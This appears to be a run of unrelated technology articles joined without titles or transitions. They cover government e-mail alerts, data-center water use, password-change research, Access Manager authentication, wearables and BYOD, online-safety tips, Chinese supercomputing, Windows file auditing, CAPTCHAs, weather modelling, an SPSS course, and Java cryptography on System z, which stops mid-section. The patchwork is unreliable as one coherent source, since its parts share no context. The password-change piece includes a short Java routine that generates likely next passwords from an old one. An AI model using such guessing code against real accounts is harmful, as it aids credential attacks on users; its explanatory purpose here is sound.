When the H1N1 "swine" flu epidemic broke loose in late April 2009, Americans clamored for information about the disease and its potential impact in their communities. Many local governments turned to their own Web sites and other means of digital communication to disseminate information. But simply placing a notice on a Web page or sending an e-mail isn't always sufficient. How can local governments be sure to provide the information citizens want and need in a timely fashion? And more importantly, as there may be overlap among different government departments and agencies, how can local governments be sure their citizenry can find the information they seek without difficulty? Oakland County, Mich., a community of 1.2 million residents in the state's southeastern corner, confronted these challenges head-on by implementing a new digital communication platform. The county is going even further by letting its municipalities use the service for free. The county uses a digital subscription service provided by GovDelivery. It plugs directly into an existing Web site and lets citizens sign up to receive notification via e-mail, RSS feed or text message when Web pages in specific categories are updated. For example, if a citizen were interested in being notified about swine flu, he could go to a general subscription sign-up page on a county's or municipality's Web site. There he can select from more than 40 categories, including a high-level category called Health Division, or underlying categories like Flu Information, Flu Shots or Pandemic Flu Preparedness. Whenever a Web page tagged with that category is updated - no matter what department, agency or level of government is providing that revised information - the citizen is immediately notified by e-mail with a link to the updated page. View Full Story
Energy is critical to data centers; rising prices, potential new regulations and taxes, and limited supply make it a topic that is foremost on the minds of both data center managers and industry observers. But another resource used heavily by data centers bears remembering: water. What should companies do about water when it comes to their data center facilities? Water Consumption a Concern All data centers consume energy, making energy the biggest concern for a variety of parties (companies, environmental groups and others) when it comes to resource usage. But water—although it is not used by all data centers—is another concern that is often overlooked. Water is a critical component of some data center cooling systems; large data centers using evaporative cooling, for instance, can consume hundreds of thousands of gallons of water a day. DatacenterDynamics (“Microsoft: we too use recycled water to cool data centers”) notes that Microsoft’s San Antonio data center consumes some eight million gallons of water per month: that’s about 250,000 gallons a day. A look at the U.S. Drought Monitor shows that the majority of the contiguous 48 states are under drought conditions, particularly those in the western and midwestern states, with a heavy patch of drought in Georgia and Alabama. Water supply is a perennial concern in the west, even when the region is not exceptionally dry. Large data centers with hefty water appetites can outstrip utilities’ ability to supply water, putting pressure on infrastructure and threatening availability of water to residents and companies that consume relatively small amounts. And these situations can quickly be exacerbated by drought conditions. Some data centers can and do operate without consuming much (if any) water. For these facilities, air-based cooling methods may be sufficient to prevent equipment from overheating. But for data centers with high-density deployments—such as those pursuing high-performance computing or that use blade servers and similar equipment—air cooling is often insufficient. In these cases, liquid-cooling methods are often more appropriate, as water (for instance) is better able to hold and move heat compared with air. Depending on the details of the cooling implementation, such facilities can consume large amounts of water. What Can Data Centers Do to Conserve Water? Companies that operate or plan to build data centers should keep water in mind as much as they do energy. Here are a few considerations that can aid in conservation and minimize the impact of data centers on the areas surrounding them. - Increase IT energy efficiency. Every watt of power consumed in your data center is converted into heat that must be removed to the outside environment. The less heat your facility produces, the less cooling you’ll need to do. Typically, savings in this area focus on reduced costs and energy consumption, but reduced water consumption is another area of savings for those data centers that employ liquid cooling. Greater energy efficiency is beneficial in a variety of ways, and saving water is one of them. - Consider alternative water sources. Water is (almost) everywhere, but potable water (the stuff that comes out of your tap) is a relatively precious resource. Some companies, such as Google, are instead turning to so-called grey water as a means of meeting their data centers’ need for water while reducing their impact on potable water supplies. Grey water is wastewater from sinks, tubs and similar uses that doesn’t contain human waste. 
Because it doesn’t require the same treatment as “brown water”—and because data centers do not need potable water—grey water that is cleaned up slightly can be used for cooling. This approach reduces the effort (and energy) needed to treat the water, aiding the utility and reducing pressure on potable supplies. Of course, it’s not quite as simple as running water from bathroom sinks directly into the data center (“Google cools data center with bathtubs, dishwashers”), and it may not be a good alternative for small companies running a data center, but it is a possibility for companies operating large facilities. Even seawater is a possibility for cooling (“Google to double seawater-cooled Hamina data center’s capacity”), although the salt content creates some technical challenges—such novel methods might best be left to companies like Google. - Improve cooling efficiency in the data center. Increasing IT efficiency is one way to decrease water consumption if you facility uses water-based cooling, but there are other steps you can take. Implement standard industry practices for better cooling efficiency: for instance, use hot-aisle/cold-aisle containment, ensure minimum mixing of hot air and cold air (e.g., plug open cable holes in cabinets) and ensure minimum obstruction of airflow. - Use free cooling. ASHRAE’s recently updated temperature and humidity guidelines enable many data centers to operate at higher temperatures, meaning less cooling is needed overall. Furthermore, these guidelines make free cooling a possibility for a larger portion of the year—all year long, in most locations (depending on the particulars of the IT equipment). Free cooling provides a host of benefits, including less cooling infrastructure (and hence lower capital costs), lower energy consumption and lower water consumption (thus reducing operating expenses). Although free cooling isn’t really free, it’s much less expensive than traditional cooling methods, and it can ease the pressure large data centers place on both electrical and water utilities. - Choose your location wisely. If you’re building a data center that relies heavily on water, you will naturally want to select a location where water is readily available. In addition to minding the risks to your business (e.g., the potential for drought and its possible effects on the water supply), consider the impact your facility will have on utilities and, thus, residents and other businesses. Check with utilities to determine if an alternative water source (like grey water) is a possibility. Stay on the good side of everybody as much as possible—you don’t want to earn a reputation as a water hog, particularly if a drought strikes. - Monitor your water efficiency. The less water you use, the more money you save; so keep track of how much water you’re using. Metrics like The Green Grid’s water usage effectiveness (WUE—similar to PUE, or power usage effectiveness) can help you monitor your data center’s water efficiency. Set goals for improved efficiency and work toward them. Water isn’t as flashy as energy, but it’s a critical component of many data centers, and it is just as important a resource. If your data center consumes water, you can take steps to improve your efficiency and cut costs as well; the key is to make water a priority, just like energy. Of course, efficiency improvements generally incur some costs, and weighing the costs relative to the benefits is a necessary part of the business. 
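To put a number on the WUE metric mentioned in the last consideration above: The Green Grid defines WUE as a facility's annual water usage in liters divided by the annual IT equipment energy in kilowatt-hours, giving a figure in L/kWh. The sketch below shows the arithmetic; the water and energy figures are made-up illustrations, not measurements from any real facility.

// Minimal sketch of The Green Grid's WUE metric (liters of water per kWh of IT energy).
public class WueCalculator {
    // WUE = annual site water usage (liters) / annual IT equipment energy (kWh)
    static double wue(double annualWaterLiters, double annualItEnergyKwh) {
        return annualWaterLiters / annualItEnergyKwh;
    }

    public static void main(String[] args) {
        double annualWaterLiters = 30_000_000.0;   // hypothetical: ~30 million liters per year
        double annualItEnergyKwh = 17_500_000.0;   // hypothetical: ~17.5 million kWh of IT load
        System.out.printf("WUE = %.2f L/kWh%n", wue(annualWaterLiters, annualItEnergyKwh));
    }
}

Tracking this figure month over month, alongside PUE, makes it easy to see whether efficiency projects are actually reducing water consumption rather than just energy use.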
The current drought situation—particularly in the west and midwest—shows that water cannot be ignored. Whether you’re operating a data center or planning to build one, make water conservation a top concern, both for the sake of saving costs and for the sake of protecting a precious resource. Photo courtesy of dr_relling
According to security expert Bruce Schneier, frequent password changes are a bad security idea, despite what all the experts keep telling us. In a recent blog post, Schneier states, "I've been saying for years that it's bad security advice, that it encourages poor passwords." By studying the data, researchers at the University of North Carolina identified common techniques account holders used when they were required to change passwords. Schneier explains that a password like "tarheels#1" (excluding the quotation marks), for instance, frequently became "tArheels#1" after the first change, "taRheels#1" on the second change, and so on. Or it might be changed to "tarheels#11" on the first change and "tarheels#111" on the second. Another common technique was to substitute a digit to make it "tarheels#2", "tarheels#3", and so on. Schneier quotes Lorrie Cranor, the US Federal Trade Commission's chief technologist, who recently spoke at Passwords Con 2016: "The UNC researchers said if people have to change their passwords every 90 days, they tend to use a pattern and they do what we call a transformation," Cranor explained. "They take their old passwords, they change it in some small way, and they come up with a new password." The researchers used the transformations they uncovered to develop algorithms that were able to predict changes with great accuracy. Then they simulated real-world cracking to see how well they performed. In online attacks, in which attackers try to make as many guesses as possible before the targeted network locks them out, the algorithm cracked 17 percent of the accounts in fewer than five attempts. In offline attacks performed on the recovered hashes using superfast computers, 41 percent of the changed passwords were cracked within three seconds. You can read more from Bruce Schneier on his blog at www.schneier.com.
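The point about predictability is easy to demonstrate. The sketch below is not the UNC researchers' actual algorithm -- it is only a toy illustration of how little work an attacker needs to do to enumerate the "obvious" variants of an expired password: flipping the case of one letter, or bumping or repeating a trailing digit.

// Toy illustration (not the researchers' algorithm): given an old password,
// generate the most predictable "next" passwords a user might pick.
import java.util.ArrayList;
import java.util.List;

public class TransformGuesser {
    static List<String> likelyNextPasswords(String oldPassword) {
        List<String> guesses = new ArrayList<>();
        // Toggle the case of each letter in turn (tarheels#1 -> tArheels#1, taRheels#1, ...)
        for (int i = 0; i < oldPassword.length(); i++) {
            char c = oldPassword.charAt(i);
            if (Character.isLetter(c)) {
                char flipped = Character.isUpperCase(c) ? Character.toLowerCase(c) : Character.toUpperCase(c);
                guesses.add(oldPassword.substring(0, i) + flipped + oldPassword.substring(i + 1));
            }
        }
        // Bump or duplicate a trailing digit (tarheels#1 -> tarheels#2, tarheels#11)
        if (!oldPassword.isEmpty()) {
            char last = oldPassword.charAt(oldPassword.length() - 1);
            if (Character.isDigit(last)) {
                guesses.add(oldPassword.substring(0, oldPassword.length() - 1) + (char) (last == '9' ? '0' : last + 1));
                guesses.add(oldPassword + last);
            }
        }
        return guesses;
    }

    public static void main(String[] args) {
        System.out.println(likelyNextPasswords("tarheels#1"));
    }
}

Running it on "tarheels#1" prints exactly the kinds of variants described above, which is why so many "changed" passwords fell to the researchers' predictions within a handful of guesses.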
The following figure illustrates the components and process flow that make up a basic configuration.

Figure 1-1 Basic Process Flow

1. The user sends a request to the Access Gateway for access to a protected resource.
2. The Access Gateway redirects the user to the Identity Server, which prompts the user for a username and password.
3. The Identity Server verifies the username and password against an LDAP directory user store (eDirectory, Active Directory, or Sun ONE).
4. The Identity Server returns an authentication artifact to the Access Gateway through the browser in a query string.
5. The Access Gateway retrieves the user's credentials from the Identity Server through the SOAP channel in the form of a SOAP message.
6. The Access Gateway injects the basic authentication information into the HTTP header.
7. The Web server validates the authentication information and returns the requested Web page.

You configure the Access Manager so that a user can access a resource on a Web server whose name and address are hidden from the user. This basic configuration sets up communication between the following four servers.

Figure 1-2 Basic Access Manager Configuration

Although other configurations are possible, this section explains the configuration tasks for this basic Access Manager configuration. This section explains how to set up communication using HTTP. For HTTPS over SSL, see Section 2.0, Enabling SSL Communication.
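As an illustration of step 6 above, HTTP basic authentication is nothing more than a request header carrying the Base64-encoded username and password. The host name and credentials below are hypothetical, and the exact headers the Access Gateway adds depend on how the protected resource is configured; this only shows the general shape of what the back-end Web server receives:

GET /protected/page.html HTTP/1.1
Host: webserver.example.com
Authorization: Basic YWxpY2U6UGFzc3cwcmQ=

The value after "Basic" is simply the Base64 encoding of "alice:Passw0rd". Because Base64 is an encoding rather than encryption, this traffic should only travel over connections you trust, which is one reason the SSL setup referenced above matters.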
Wearable devices are one of the corporate favorites in IT and mobile industry today, especially with recent VR gadgets introduction in the gadget. Wearables are transitioning from trendy gadgets to useful technology. Such devices act as an additional screen for your smartphone. Doing tasks like telling time, giving notifications and running apps, the major details consists of the data you can collect from the sensors in the device. Opposite to the common belief, Wearables consists of actually three different styles: monocular, immersive, and wrist-worn. Many companies are introducing wearables in their wellness programs to make them a success. Sensors analyze time and type of activity that are involved in completing a task, and provide the companies more information. The activity-tracking bands track how many steps you take, how many calories you burn, heart rate and other health and wellness statistics. As of now, fitness-tracking wearables are extremely popular for consumers but user interest in the device usually fades after the three-to-four month whereas in the corporate world, wearables are taking on vital roles in companies every day. Organizations being large or small have been steadily embracing BYOD in lieu of cost savings and increased productivity as their primary motives but risk to sensitive data overcome the benefits. It is logical that most of the people who bring their laptops to use at work usually connect to the company’s WiFi network. This causes the companies to run into wireless network bandwidth performance problems as a single Wi-Fi connection can support 15-20 devices providing good speed to each connection. If more than that number is connected, the connection signal strength begins to deteriorate. This opens the possibility of network instability. Increasing exposure to malware and viruses due to lack of control into personal devices accessing the network has put the security of company’s confidential data at stake. Use of wearables at workplace In a corporate culture which is always on, smart watches, glasses and other wearable digital gadgets act for improving worker wellness and productivity. In a survey sponsored by the software company Cornerstone OnDemand, 66% of U.S. working population responded that they will positively use wearable in corporate culture. People who were reluctant in using the digital gadgets can be motivated by offering monetary benefit such as reduced health insurance premiums or discounted exercise programs. Smartwatches and glasses, such as the Apple Watch and Google Glasses are known for their personal assistant features alongside fitness tracking. Advantages of BYOD The trend of using own device at work can make it easier for workers to accomplish their tasks. Companies have introduced simple and light weight mobile applications that allow employees to access and share corporate data more smoothly. Users can work at their convenience from anywhere. BYOD can even minimize usage of different applications if workers take advantage of the apps available. It is logical enough to expect that there will be objections and privacy and security are issues of primary concern. Most of the employees will not be comfortable with the fact that management is having access to all of their data. The devices can save photos, record vital signs, or track movement. Of course, not many employees want to wear a fitness band or smartwatch. These advances affect every aspect of human lives both at work and play. 
This rapid technological advancement leaves us wondering if the changes which the new technology brings are only positive. Texting and email affect our verbal and written communication skills. Corporate Risks involved in BYOD primarily include – • Malicious Code • Device Attacks Most of the apps across all wearable platforms fail basic security tests. Additional efforts by the Employer IT can expect increased support costs associated with BYOD for helping employees compliant with the corporate policies and federation laws. Developers will require help of device admins to help plan and implement apps on the devices which are different in make and configuration, and admins will have to simultaneously ensure that the devices should not put corporate resources at risks. IT of the company must also be prepared for the additional pressure on the corporate infrastructure which they get from personal devices connecting to their internal systems. If you are letting workers store sensitive data on their own devices the risk of corporate data is at risk if a device is lost, stolen or infected with malware. When an employee leaves the company along with the device, the organization might be unable to reclaim sensitive data. Even if workers use their own devices, the organization must ensure that the data is protected as required by regulation and law wither through RSA or VPN or security certificates. The enterprise must also understand the liability, if sensitive data is compromised. With immersive gadgets like VR headsets and smart glasses being introduced, corporate trainees can indulge in the training and the presentations which keeps the interest in the content. In cutting edge corporate world, employees need immediate access to corporate manuals, training materials, or tutorials that can give them a step-by-step walkthrough of a specific task or help the customer virtually. Wearables give them instant access and convenience to customer as well. Training and induction cost to the company is reduced as well as number of training programs are reduced as the employees have instant access to all the online content and documentation. Using wearable technology in corporate strategy can reduce costs and increase productivity. However, any device that records any kind of data like audio, video could be a threat to co-workers privacy and business security. Employers need to gain their employees trust and be transparent about how the gathered employee data will be used. One thing businesses should be doing is to restrict the use of wearables devices at work and monitor them if they are connecting to corporate networks. The policy of the company should protect the privacy of the individual and the privacy of the corporation.
Start off the New Year With Safe Online Computing Recent polls conducted by the Pew Research Center found that 73 percent of Americans go online on a daily basis. And one out of five Americans report going online "almost constantly." With all that time on the internet, we wanted to share a few more tips to help keep your time online safe: - Avoid searching for celebrity gossip. Malware authors know that people naturally gravitate toward gossip and plan new attacks specifically targeting people looking for gossip. - Avoid file-sharing sites dealing with copyrighted material, as they can open you up to potential hacker targeting. - Don’t do online gaming. Many of these sites sneak adware onto your PC, and some are fronts for identity theft rings. - Set your Facebook privacy settings so they are not “open.” If you enter your birthdate, location or even your phone number without changing the privacy setting, your information could be seen by everyone. - Never connect to unknown wireless networks. In public places like airports and hotels, be careful about logging in, as people can eavesdrop. - Do not use the “save my password” feature. Although it is a convenient feature, anyone using your computer can then access the site with your password. Check out our CenturyLink Security Blog for more online safety tips.
Anyone who hasn’t noticed the ascendency of China in high-tech has probably been sleeping in a cave since about 2005. Assuming you are at least a casual reader of HPCwire, then you’re already well aware of the rise of Chinese supercomputing over the past few years. But it doesn’t stop there. The country is determined to become a technology superpower. Certainly China has been on a fast track to supercomputing stardom. Although still number two to the US in sheer numbers of supercomputers, the Asian nation currently has 74 systems on the TOP500 list, including the number 2 (Tianhe-1A) and number 4 (Nebulae) machines. Five years ago, they had just 18 such systems, and none in the top 10. More recently, China designed and built the Sunway BlueLight MPP supercomputer, a petaflop-capable system, using home-grown CPUs. More indigenously produced HPC machines are on the way as companies like Lenovo and Dawning ramp up their penetration of the domestic market. The larger story of China’s high-tech rise is being taken up by the mainstream media. For example, the New York Times this week reported that China “will soon have the world’s largest domestic market for both Internet commerce and computing.” That local market is driving innovation up and down the computer food chain. Some of the innovation resembles that of Silicon Valley, where fast-growing startups and a workaholic culture are fueling a growing influx of venture capital– $7.6 billion today, up from $2.2 billion in 2005. At the same time, Chinese patents are being issued at a breakneck rate, overtaking that of South Korea and Europe and catching up with the US and Japan. But, as the NYT piece reports, some innovation there takes a different form. According to Clyde Prestowitz, president of the Economic Strategy Institute, in China, much of the new technology is based on continuous improvement, something, Prestowitz says, the US and Westerners are less adept at. For example, two homemade Chinese CPUs — the ShenWei SW1600 used in the Sunway BlueLight super, and the Godson-3B processor that will power an upcoming Dawning system — are based on RISC designs originally developed in the US. But both chips, the NYT article points out, are among the most efficient in performance-per-watt, which is becoming the critical metric for supercomputing. As IDC pointed out during a presentation last month at SC11, the Chinese are investing heavily in HPC, including the supercomputer centers themselves. Here the country intends to have a least 17 petascale-capable facilities within the next five years, which would rival that of the US and Europe. None of this is escaping the notice of the HPC community. The Times article quotes Donna Crawford, the associate director of computation at the Lawrence Livermore National Laboratory, who notes, “The overall point of all of this is that the Chinese understand the importance of high-performance computing.” That’s not to say China is a high-tech utopia. They’re still behind their competition on semiconductor technology (three generations, according to the NYT article). And the lack of intellectual property protection may discourage entrepreneurs looking to maximize profit from specific inventions. But China has started churning out hardware and software engineers in tremendous numbers, some of which are being trained at the best engineering schools in the world, like UC Berkeley and MIT. It is these engineers that will form the next wave of Chinese tech innovators in their country. 
Let loose in the largest domestic technology market in the world, this next generation of techies may well create the next Silicon Valley.
Auditing Specific Events - Page 2 As you can see, you can audit quite a few actions. Because some of the actions may be a bit unclear, and because other actions aren't listed in the figure, I'll describe each action: - Traverse Folder/Execute File--In the case of a folder, this event is triggered when a member of the group tries to pass through the folder in an attempt to reach a subfolder or parent folder. If this window were for a file, the event would be triggered if a member of the group tried to run the program. - List Folder/Read Data--In the case of a folder, the event is triggered when a member of the group tries to view the contents of the folder. In the case of a file, the event is triggered when a member of the group tries to read data from within the file. - Read Attributes and Read Extended Attributes--This event is triggered when a member of the group tries to display the attributes (or extended attributes) of the file or folder. - Create Files/Write Data--This event is triggered when a member of the group tries to create files in the folder or add data to the file. - Create Folders/Append Data--This event refers to the condition in which a member of the group either creates a subfolder within the existing folder or appends data to the end of the file without overwriting any of the file's existing data. - Write Attributes and Write Extended Attributes--These events refer to a member of the group trying to change the file or directory's attributes or extended attributes. - Delete Subfolders and Files--This event is triggered when a member of the group deletes a file or subdirectory within an audited directory. - Delete--The Delete action is logged when a group member tries to delete a file or folder. - Read Permissions--This event is logged when a group member tries to see who has permissions to a file or folder, or if the group member tries to determine the owner of the file or folder. - Change Permissions--This event is logged when a group member tries to change who has access to a file or folder. - Take Ownership--The Take Ownership event is triggered when a group member attempts to take ownership of a file or folder. Remember that you can audit either successes (for example, the file was deleted) or failures (Bob tried to delete a file) or both for any event. In Part 4 of this series, I'll continue the discussion by talking about auditing Active Directory objects. // Brien M. Posey is an MCSE who works as a freelance writer. His past experience includes working as the director of information systems for a national chain of health care facilities and as a network engineer for the Department of Defense. Because of the extremely high volume of e-mail that Brien receives, it's impossible for him to respond to every message, although he does read them all.
I'm not as smart as a bot. I know this because stories are floating around the blogosphere today about how CAPTCHAs, those annoying word puzzles you have to solve before you're allowed to do stuff on many websites, are easy to crack. Maybe so. But I can't crack them. (CAPTCHA, by the way, stands for Completely Automated Public Turing test to Tell Computers and Humans Apart. It was developed at Carnegie Mellon University and acquired by Google in 2009. "Turing test" refers to the standard set in 1950 by British mathematician Alan Turing: a machine can be deemed intelligent only if its performance is indistinguishable from a person's.) Countless times I've been on the verge of buying a baseball ticket or posting a comment, only to be locked out because I can't read the strange CAPTCHA hieroglyphics. Thankfully, Google, the keeper of the virtual key that is CAPTCHA, has decided to simplify the system so ordinary humans can crack the code and get to the ball game on time. In a post on Google's security blog, CAPTCHA product manager Vinay Shet says his team has figured out a way to make the puzzles significantly easier for people to solve, while still filtering out bots. Instead of puzzles made of heavily distorted letters, the new CAPTCHAs will contain a series of numbers that are much easier to read. "Bots, on the other hand, will see CAPTCHAs that are considerably more difficult and designed to stop them from getting through," writes Shet. The new-style CAPTCHAs are already starting to appear, and you'll see more in the future as Google continues to roll them out. Sounds good, right? But there's one part I don't understand. Shet says that when the software determines the entity attempting to engage with the protected page is a machine, CAPTCHA serves up a difficult puzzle. If it determines that the entity knocking on the door is a human, it serves a simpler puzzle. That raises an obvious question: If the software already knows a machine is trying to gain access, why bother with a puzzle? I reached out to Google for some insight, and if I hear back, I'll update this post.
A recent feature piece from the Texas Advanced Computing Center (TACC) explores the relationship between the rise of powerful supercomputers and advances in weather forecasting. The most accurate atmospheric models accommodate a host of variables that can affect weather patterns. Heat, radiation, and the rotation of the Earth are just a few of the many factors that must be taken into account. The data is collected and converted into mathematical formulae, which the computers transform into weather forecasts. For some time, climate forecasts were limited to so-called global weather models, which have a resolution of 100 kilometers (km) per grid-point. Despite being the current standard upon which all official predictions are based, such models lack granularity and may omit significant details. For example, two towns that are near each other, one on a hill and the other in a valley, will be shown as having the same weather experience, when in reality there may be subtle, or not so subtle, differences. Masao Kanamitsu, an expert in atmospheric modeling and a leading researcher at Scripps Institution of Oceanography, is working on creating more precise weather models. Kanamitsu's experience goes back to the mid-1990s when he ran climate models using Cray supercomputers and Japan's Earth Simulator. Nowadays, he uses the Ranger supercomputer at the Texas Advanced Computing Center. To improve regional predictions, Kanamitsu and others working in the field use a process called downscaling. According to the article, the "technique takes output from the global climate model, which is unable to resolve important features like clouds and mountains, and adds information at scales smaller than the grid spacing." Kanamitsu is using downscaling to improve microclimate forecasts in California. By integrating additional factors — like topography, vegetation, and river flow — into the subgrid of California, Kanamitsu is achieving a resolution of 10 kilometers with hourly predictions. The method's ability to fine-tune local forecasts using global data points seems counterintuitive, a sentiment apparently shared by Kanamitsu. He states: "We're finding that downscaling works very well, which is amazing because it doesn't use any small-scale observation data. You just feed the large-scale information from the boundaries and you get small-scale features that match very closely with observations." The work requires the powerful capabilities of systems like Ranger at TACC, which excels at producing long historical downscaling in a short period of time. Kanamitsu's climate simulations have even outperformed those of the National Weather Service, and were the topic of 10 papers in 2010.
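A rough sense of why a tenfold improvement in resolution demands machines like Ranger: shrinking the grid spacing multiplies the number of grid points, and usually forces a shorter time step as well. The sketch below uses a purely illustrative 1,000 km x 1,000 km domain, not Kanamitsu's actual California configuration.

// Back-of-the-envelope comparison of horizontal grid-cell counts at two resolutions.
public class GridCost {
    // Number of horizontal grid cells needed to cover a square domain at a given spacing
    static long cellCount(double domainKm, double spacingKm) {
        long perSide = Math.round(domainKm / spacingKm);
        return perSide * perSide;
    }

    public static void main(String[] args) {
        double domainKm = 1000.0;                     // illustrative domain size
        long coarse = cellCount(domainKm, 100.0);     // 100 km global-model spacing -> 100 cells
        long fine = cellCount(domainKm, 10.0);        // 10 km downscaled spacing -> 10,000 cells
        System.out.println("100 km grid cells: " + coarse);
        System.out.println("10 km grid cells:  " + fine);
        System.out.println("Ratio: " + (fine / coarse) + "x more cells per vertical level");
    }
}

A hundredfold increase per level, multiplied across dozens of vertical levels, a finer time step, and decades of historical data, is what turns hourly 10 km downscaling into a supercomputing problem.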
In this course, you will learn the fundamentals of using IBM SPSS Statistics for a typical data analysis process. You will learn the basics of reading data, data definition, data modification, data analysis, and presentation of analytical results. You will also see how easy it is to get data into IBM SPSS Statistics so that you can focus on analyzing the information. In addition to the fundamentals, you will learn shortcuts that will help you save time. This course uses the IBM SPSS Statistics Base features.
While your company may not have to deal with compliance fines like HIPAA if you’re breached, the fact remains that data security is vital knowledge for your employees. The Target and Home Depot breaches cost those large corporations millions of dollars, but even small companies can come shuddering to a halt if they suffer a breach. Some basic training and password security can help you avoid losing access to the data and systems that keep your business running. Read on to see the biggest password mistakes we see regularly, plus some tips on crafting (and remembering) strong, unique passwords. Comic from XKCD Ok, ok—pretty much everyone knows not to use “password” as his or her password (or at least, you’d think they do—studies regularly find that the most common passwords are things like “123456” or “abc123”). But even if you include capital and lowercase letters, plus a number or a special character, chances are your password is easy to crack. Here are some of the biggest password mistakes we see people make regularly. Using information that is close to your heart Don’t use the name of a relative or anything else closely related to yourself. If the information is easy to discover, it’s easy to guess. This goes for your security questions, too—you don’t need to tell the truth for them. Chances are a hacker can find out your childhood address or even your first car and use that information to reset your password. Using a simple word or keyboard order Don’t simply use a word or type in the order of your keyboard (like “qwerty” or “ghjkl”). These are very easy to crack with a “dictionary attack”—supremely common cracking tools. However, a string of words or even a complete sentence with capitalization, spaces, and punctuation, makes a great password. Common substitutions for letters are also easy to guess, so just replacing the “a” in Amy123 with @my123 isn’t going to add much security at all. Reusing the same password Yeah, it’s a bit of a hassle to remember a dozen passwords, but keeping the same code for your e-mail, bank, and Facebook means that if someone gains access to one account, they gain access to them all. Writing down your password and keeping it near your computer You made a complex password—it’s long, it has a mix of upper and lowercase letters, and you threw in some special characters. Great! Now you can’t remember it. So you (understandably) wrote it down, along with your other dozen passwords, and stuck it under the keyboard. Bad move. It’s OK to write it down, but keep it elsewhere, write down hints instead of the actual password, or better yet, try out a password manager tool. Now that you know what not to do, here’s how can you create a password that is strong but still memorable, plus some other tips for password safety. Use a password manager Password managers help you create strong passwords and then encrypt and store your login credentials for various applications and websites, so the only password you need to remember is your login to the password manager itself. Make sure your password manager password is strong. Make it long without resorting to random characters Use a minimum of eight characters as well as a mix of character types. While it does create a much stronger password, without a password manager it’s going to be pretty hard to recall 7*wUitNf$AnR! every time you need to login to Outlook. Instead try spelling a phrase creatively, like “tAke_mE2-uR_LeADr”. Or to make it even easier to remember, just type a sentence! 
Including spaces, if they are allowed by the website or application, actually increases security. You can also substitute underscores and dashes for the spaces. A sentence or silly nonsensical phrase like "I-fell-asleep-beneath-the-flowers." or "mountaindewslurpingcats" can actually be harder to crack than a shorter password, even one with uppercase letters, numbers, or special characters. (A short sketch of generating this kind of passphrase automatically appears at the end of this post.)

Take advantage of two-factor authentication

If it is available, make sure to enable multi-factor or two-factor authentication. Many bank sites include this method, which adds a second step beyond just your password, like a security phrase or image.

If you know other employees, your teammates, your subordinates, or even your relatives are using insecure passwords or storing them in plain sight, go ahead and be a nag about it. You could save them personal trouble, and you could save your company the hassle, expense, and reputation hit of a security breach.

Posted by: Systems Engineer Jim Taylor
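As promised above, here is a minimal sketch of a passphrase generator in the spirit of the "mountaindewslurpingcats" advice. The eight-word list is purely illustrative -- a real generator should draw from a dictionary of several thousand words -- and SecureRandom is used so the word choices are not predictable.

// Minimal passphrase generator sketch; the word list is a tiny stand-in for a real dictionary.
import java.security.SecureRandom;

public class PassphraseGenerator {
    private static final String[] WORDS = {
        "mountain", "dew", "slurping", "cats", "purple", "anchor", "thirty", "lantern"
    };

    public static String generate(int wordCount) {
        SecureRandom rng = new SecureRandom();
        StringBuilder phrase = new StringBuilder();
        for (int i = 0; i < wordCount; i++) {
            if (i > 0) phrase.append('-');              // dashes work where spaces are not allowed
            phrase.append(WORDS[rng.nextInt(WORDS.length)]);
        }
        return phrase.toString();
    }

    public static void main(String[] args) {
        System.out.println(generate(4));   // e.g. "cats-lantern-dew-purple"
    }
}

Four words drawn from a list of a few thousand gives tens of trillions of possible combinations -- far more than the short passwords most people actually choose -- while remaining something a person can genuinely remember.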
Cryptography can take many forms. It can be used to protect data in flight or data at rest, to authenticate a user, or provide a digital signature for banking or finance applications. Cryptography provides the building blocks applications use to protect the intellectual property that differentiates one customer from another. Over the years, as Linux on System z has taken on a strong leadership role with Web- and Internet-facing applications, the value of Java and access to cryptography from Java has become paramount. Since Java is the most widely used language for Web applications, these applications have assumed the roles of protecting the confidentiality and integrity of data in the enterprise and the authentication of users and their authorization to various functions or data. Hardware cryptography available on System z brings added business value to Java applications when running on Linux. The Crypto Express3 or Crypto Express4 cards in accelerator mode can provide cost-saving offload options, freeing up the processor to do other work as well as yielding drastic improvements in speed. The Central Processor Assist for Cryptographic Function (CPACF) capabilities, also available to Java applications, provide additional savings in processing time, which means better overall application throughput and cost savings. Banks and financial institutions can take advantage of the robust secure key and banking functions available on the Crypto Express3 and Crypto Express4 cards in coprocessor mode. Writing a Java program that uses cryptographic functions from a library that exploits the System z cryptographic hardware can seem complex. It involves several components that must work together: the Linux kernel with a crypto device driver, System z-specific crypto libraries, openCryptoki with specific tokens, the Java Cryptography Architecture (JCA) with the Java Cryptography Extension (JCE) Application Program Interface (API) and the appropriate Java provider. Here we demonstrate how to set up Linux on System z for an application to exploit cryptographic hardware features of the System z architecture using a simple Java program for encrypting and decrypting a message using the Advanced Encryption Standard (AES). However, let’s first briefly describe the cryptographic hardware features supported by the System z platform and the software stack needed to exploit these features in a Java program. System z Cryptographic Hardware The System z architecture provides CPACF on its processors, which is a free installation option for all System z servers in countries that aren’t subject to U.S. export regulations for cryptography. CPACF provides instructions that compute hash functions (SHA-1, SHA-224, SHA-256, SHA-386 and SHA-512), cryptographic functions to encrypt or decrypt messages using Data Encryption Standard (DES), triple DES, AES-128, AES-192 and AES-256 using several modes of operations (ECB, CBC, CFB, OFB, CTR, XTS, CCM and GCM), support for message authentication codes such as CBC-MAC, CMAC and GMAC, and a pseudo random generator. Depending on the size of the message to be encrypted, some modes of operation implemented in CPACF are more than 10 times faster than software implementations. Crypto Express Adapters support offloading cryptographic functions to an adapter card, freeing the CPUs to perform other work. Linux can exploit Crypto Express Adapters both in accelerator mode, identified as CEX2A, CEX3A and CEX4A, and coprocessor mode, identified as CEX2C, CEX3C and CEX4C. 
Crypto Express Adapters in both accelerator mode and coprocessor mode provide functions for RSA clear key encryption and decryption, with the accelerators providing better performance than the coprocessors. In addition, the Crypto Express coprocessors provide a true random number generator and functions for secure key cryptography according to the Common Cryptographic Architecture (CCA). With clear key cryptography, cryptographic keys are stored in memory in the clear. With secure key cryptography, all keys stored in memory are encrypted; these keys can only be decrypted and used to encrypt or decrypt messages inside a tamper-proof Hardware Security Module (HSM) such as the Crypto Express coprocessors, which can be addressed using an API defined in the CCA. Figure 1 shows the use of both clear key and secure key cryptography.

The Linux Crypto Software Stack

The crypto software stack required in this example for a Java application to exploit cryptographic hardware consists of three layers: the Linux kernel with its crypto device driver, the System z-specific crypto libraries together with openCryptoki and its tokens, and the Java layer, that is, the JCA/JCE API with the appropriate provider.
